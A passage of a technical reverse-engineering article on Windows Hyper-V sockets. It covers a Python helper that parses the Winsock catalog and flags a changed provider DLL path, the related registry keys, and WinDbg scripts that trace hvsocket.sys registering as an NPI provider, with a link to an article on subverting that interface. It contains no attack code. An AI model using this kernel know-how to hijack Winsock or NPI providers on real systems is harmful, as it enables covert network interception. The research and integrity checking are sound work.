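        if line == "Winsock Catalog Provider Entry":
            current = {}
            entries.append(current)
        elif current is not None and ":" in line and not line.startswith("-"):
            key, _, value = line.partition(":")
            current[key.strip()] = value.strip()
    return entries

def find_hyperv_entries(entries):
    return [e for e in entries if e.get("Address Family") == str(AF_HYPERV)]

def decode_service_flags(value):
    """Names of the XP1_* bits set in a Service Flags string such as '0x20026'."""
    flags = int(value, 16)
    names = [name for bit, name in sorted(XP1_FLAGS.items()) if flags & bit]
    unknown = flags & ~sum(XP1_FLAGS)
    return names + ([f"unknown:0x{unknown:x}"] if unknown else [])

def pack_sockaddr_hv(vm_id, service_id):
    """SOCKADDR_HV: USHORT Family, USHORT Reserved, GUID VmId, GUID ServiceId."""
    # GUIDs use the Windows in-memory layout, which uuid exposes as bytes_le.
    return struct.pack("<HH", AF_HYPERV, 0) + vm_id.bytes_le + service_id.bytes_le

def unpack_sockaddr_hv(buf):
    """Inverse of pack_sockaddr_hv: returns (family, vm_id, service_id)."""
    family, _reserved = struct.unpack_from("<HH", buf, 0)
    return family, uuid.UUID(bytes_le=buf[4:20]), uuid.UUID(bytes_le=buf[20:36])

def check_hyperv_entry(entry):
    """Compare an entry with what the article shows for Hyper-V RAW.

    Returns the list of discrepancies (empty when everything matches). The
    Provider Path deserves the first look: the catalog decides which DLL
    Winsock loads for AF_HYPERV sockets, so a changed path needs explaining."""
    addr_len = len(pack_sockaddr_hv(HV_GUID_WILDCARD, HV_GUID_WILDCARD))  # 36
    expected = {"Address Family": AF_HYPERV, "Socket Type": SOCK_STREAM,
                "Protocol": HV_PROTOCOL_RAW, "Max Address Length": addr_len,
                "Min Address Length": addr_len}
    problems = [f"{key}: got {entry.get(key)}, expected {want}"
                for key, want in expected.items() if int(entry.get(key, -1)) != want]
    if not entry.get("Provider Path", "").lower().endswith(r"\system32\mswsock.dll"):
        problems.append(f"Provider Path: {entry.get('Provider Path')}")
    return problems
```

On a live system, feed the script the real output of netsh winsock show catalog instead of SAMPLE_CATALOG; a non-empty result from check_hyperv_entry is a prompt to look at the registry keys described below.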
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the registry, one key is created for each provider (32-bit and 64-bit):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\000000000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="65" src="https://lh3.googleusercontent.com/rfdz8BOqdiW3EmqLGfdrWSxLyKj6gyrieoGIWwLMqm-OF3eQT9r133L_IaFW0nGarRTESWBe6EK4rpEpYCgvZKYo7nAmDZrxAY56qgRkYEyOvl6_XRZR76802U5MVBgZWGYDXqw2kSuzbcnhpg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="574" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The vmbus transport was added under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock\Parameters (irda and RFCOMM are absent in a default installation of Windows Server 2016 and are present only in Windows 10):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="52" src="https://lh6.googleusercontent.com/pbhGWmXcFOPJ_3HULrWNTgi_ZMK2dz5Is2wQHqprZNBqjTMwLCc2W3VXsVZ5J-n-DgAj0FjLat9p7R1QgTMz1YorBMpeqhrCaQFtBspmb27gCEMrQ0aTknzuTVjc3mamDj_Sm6eN4CiTO_I_Eg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="580" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vmbus\Parameters</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> contains the Winsock subkey with the HelperDllName parameter, which names the wshhyperv.dll library that the main provider, mswsock.dll, loads at socket creation.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="77" src="https://lh4.googleusercontent.com/gFyDpKDjNXkFzmaCw3rIU-1GT23dzvd2BR5LgkbX1jMicTzag_o5b0SaPSsSTua5HUm7lhUh-mKnQGKJxPfwtdye-9HHaf65aRdbgRu-lorCEHSLejGdQDWn7mT4MbcVT1tbRdFr4f2H4VH_NA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="513" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="181" src="https://lh3.googleusercontent.com/vcXjBO9CGmJIDCEjqOkSMAQ9fCj8Si5f0TQzeJzUQqxSThWG6LuqPF5pwFLR8bQlE3R3yYnJjWpjzP6p5UZbZwUb15eg7CD7GZ-xXKlivdlx6xH6IjKul3Sj4O_n_NFK6UfTnqIOpNwT4pJQpg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="545" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Internals, 6th edition, says: "Note The Raw transport protocol is not really a protocol and does not perform any encapsulation of the user data. This allows the client to directly control the contents of the frames transmitted and received by the network interface." In our case the Hyper-V RAW protocol is used. However, despite the protocol name containing RAW, when a socket is created the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function is called with SOCK_STREAM as its second parameter (socket type: stream socket), even though WinSock2.h defines a separate socket type, SOCK_RAW.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A new NPI provider appeared: hvsocket.sys. It is present in the imports of the vmbus.sys, vmbusr.sys and netio.sys drivers and is therefore loaded together with whichever of these modules starts first (usually netio.sys). The provider is registered by the vmbusr.sys driver through a call to the imported function hvsocket!HvSocketProviderStart, which in turn calls netio!NmrRegisterProvider.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Working with providers is described in detail in the article "The network program Windows Vista/2008 interface: internal device, use and breaking" </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://vxlab.info/wasm/print.php-article=npi_subvert.htm)</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using WinDbg it is possible to obtain the list of all registered providers and their clients. For providers, a small script is enough: we set a breakpoint on netio!NmrRegisterProvider and write the parameter values to a log file:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg> bu netio!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg> .logopen D:\ida_files\2016\log.txt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg> bp netio!NmrRegisterProvider ".echo **********bp netio!NmrRegisterProvider********; .echo kc;kc; .echo dps rcx;dps rcx; .echo NpiId GUID; dt _GUID poi(rcx+28h); .echo NPI_MODULEID_TYPE GUID; dt _GUID poi(rcx+30h)+8; g"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS NmrRegisterProvider(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PNPI_PROVIDER_CHARACTERISTICS ProviderCharacteristics,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ProviderContext,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PHANDLE NmrProviderHandle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="275" src="https://lh6.googleusercontent.com/T24jUa08MVr0G_TNq7Coa6Y_hZB0c3TKvvCmeSAZU84Qm47aKPY-1cpaNU0pwL5T3ris_SI5ff84dU8XVn6j-PVsRofRB4OwYefGbHyqvaT8AcjokjTRTxs71uOHi3u0QmsV6jJxce3Avl1Dog" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="491" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">typedef</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _NPI_REGISTRATION_INSTANCE {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Version;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Size;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PNPIID NpiId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PNPI_MODULEID ModuleId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ULONG Number;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VOID *NpiSpecificCharacteristics;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} NPI_REGISTRATION_INSTANCE, *PNPI_REGISTRATION_INSTANCE;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">typedef</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _NPI_MODULEID {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Length;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> NPI_MODULEID_TYPE Type;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">union</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID Guid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> LUID IfLuid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> };</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} NPI_MODULEID, *PNPI_MODULEID;</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The registration of hvsocket.sys as a provider looks like this:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!HvSocketProviderStart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!RootDeviceAdd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDriverDeviceAdd::Invoke</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!FxDriver::AddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 nt!PpvUtilCallAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 nt!PnpCallAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 nt!PipCallDriverAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 nt!PipProcessDevNodeTree</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 nt!PiProcessStartSystemDevices</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!PnpDeviceActionWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dps rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece010 00000000`00480000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece018 fffff806`0ded1640 hvsocket!HvSocketNotifyAttachClient </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderAttachClient</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece020 fffff806`0ded18c0 hvsocket!HvSocketNotifyDetachClient </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderDetachClient</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece028 fffff806`0ded19a0 hvsocket!HvSocketNotifyCleanupClientContext </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderCleanUpBindingContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece030 00000000`00280000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– Begin of NPI_REGISTRATION_INSTANCE (Version+Size)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece038 fffff806`0decc3e0 hvsocket!NPI_TRANSPORT_LAYER_ID – </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pointer to NpiId (GUID NPIID) - dt _GUID poi(rcx+28h)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece040 fffff806`0decc3f0 hvsocket!NPI_MS_VMBUS_MODULEID </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– pointer to ModuleId – dt _GUID poi(rcx+30h)+8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece048 00000000`00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- Number</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece050 fffff806`0decc2e0 hvsocket!VmbusTlProviderCharacteristics - </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NpiSpecificCharacteristics</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece058 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece060 00000500`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece068 0000ef8b`4509d61c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
